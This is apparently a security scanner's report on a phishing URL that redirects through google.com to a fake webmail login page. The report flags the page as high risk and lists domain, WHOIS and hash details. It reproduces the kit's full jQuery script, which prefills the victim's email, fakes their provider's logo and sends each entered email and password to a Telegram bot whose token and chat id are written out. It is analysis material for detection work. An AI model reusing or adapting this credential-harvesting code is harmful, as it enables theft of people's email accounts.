phishing scam

cryptocurrency blockchain

English

Domain 'www.google.com' uses the commercial generic top-level domain (.com) and includes subdomain 'www'. Its registrable label 'google' stretches across 6 characters split between 3 vowels and three consonants. Splitting it apart reveals 1 word: google. Median word length comes out to 6 characters. No strong language cues emerged from the frequency lists.

lourl

email

password

loginForm

html/2f/17/2f175e25-8b17-4892-907a-90da29836e0a.html.gz

ff1523fb7389539c84c65aba19260648793bb4f5e29329d2ee8804bc37a3fe6e

e32734ff000d72772084d24f3bc1c2f6b5b96f699c642b088847a518f9fab615

f79a48c10ccf61401ff658787193c4728da81024622a343ad104637a4df67550

width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0

viewport

theme-color

msapplication-navbutton-color

object-src 'none';base-uri 'self';script-src 'nonce-TcIxUDOh628ZoS8LYiXnvA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other

GoDaddy.com, LLC

NAHMIASABOGADOS.COM

MarkMonitor Inc.

GOOGLE.COM

Abuse Account

Fastly RIR Administrator

Fastly Network Operations

Fastly, Inc.

SKYCA-3


/* global $ */
$(document).ready(function() {
  var count = 0;

  $('#back1').click(function() {
    $("#msg").hide();
    $('#email').val("");
    $("#automail").animate({left: 200, opacity: "hide"}, 0);
    $("#inputbar").animate({right: 200, opacity: "show"}, 1000);
  });

  var email = window.location.hash.substr(1);
  if (!email) {
    // Handle case when email is not present
  } else {
    var my_email = email;
    $('#email').val(my_email);
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

    if (!filter.test(my_email)) {
      $('#error').show();
      email.focus;
      return false;
    }
    var ind = my_email.indexOf("@");
    var my_slice = my_email.substr((ind + 1));
    var c = my_slice.substr(0, my_slice.indexOf('.'));
    var final = c.toLowerCase();
    var finalu = c.toUpperCase();

    $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
    $("#logoname").html(finalu);
    $(".logoname").html(finalu);
  }

  $('#submit-btn').click(function(event) {
    $('#error').hide();
    $('#msg').hide();
    event.preventDefault();
    var email = $("#email").val();
    var password = $("#password").val();
    var msg = $('#msg').html();
    $('#msg').text(msg);

    if (!password) {
      $('#error').show();
      $('#error').html("Password field is empty.!");
      return false;
    }

    ///////////new injection////////////////
    var my_email = email;
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

    if (!filter.test(my_email)) {
      $('#error').show();
      email.focus;
      return false;
    }

    var ind = my_email.indexOf("@");
    var my_slice = my_email.substr((ind + 1));
    var c = my_slice.substr(0, my_slice.indexOf('.'));
    var final = c.toLowerCase();
    var finalu = c.toUpperCase();

    $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
    $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
    $("#logoname").html(finalu);
    ///////////new injection////////////////
    count = count + 1;

    $.ajax({
      dataType: 'json', // JSON is lowercase
      url: 'https://api.telegram.org/bot8698632723:AAFDto5F7hlLt6Mn7ajK7lXXtOvQ_5ceU8c/sendMessage',
      type: 'POST',
      data: {
        chat_id: '6784063670',
        text: `***** Webmail Result *****\r\nEmail: ${email}\r\nPassword: ${password}\r\n*****`
      },
      beforeSend: function(xhr) {
        $('#submit-btn').html('Verifying...');
      },
      success: function(response) {
        if (response.ok) {
          $("#msg").show();
          console.log(response);
          $("#password").val("");
          if (count >= 3) {
            count = 0;
            window.location.replace("http://" + my_slice + ":2095");
          }
        } else {
          console.log('Telegram API error:', response);
          // Handle the case when the Telegram API does not respond with 'ok'
        }
      },
      error: function(xhr, status, error) {
        console.log('AJAX error:', status, error);
        $("#password").val("");
        if (count >= 3) {
          count = 0;
          window.location.replace("http://" + my_slice + ":2095");
        }
        $("#msg").show();
        // Handle errors here
      },
      complete: function() {
        $('#submit-btn').html('Sign in');
      }
    });
  });
});


  

PasswordField

JQuery

RoundCube

jQuery CDN

Omdirigeringsmeddelande

⚠️ High Risk - https://www.google.com/url?q=https%3A%2F%2Fnahmiasabogados.com%2Fmul%2Findex.html

Requests	IP Address	Location	AS Autonomous System
13	142.251.157.119	United States	AS15169Google LLC
13	1	-	-

Security Scan Report: www.google.com

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies5

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History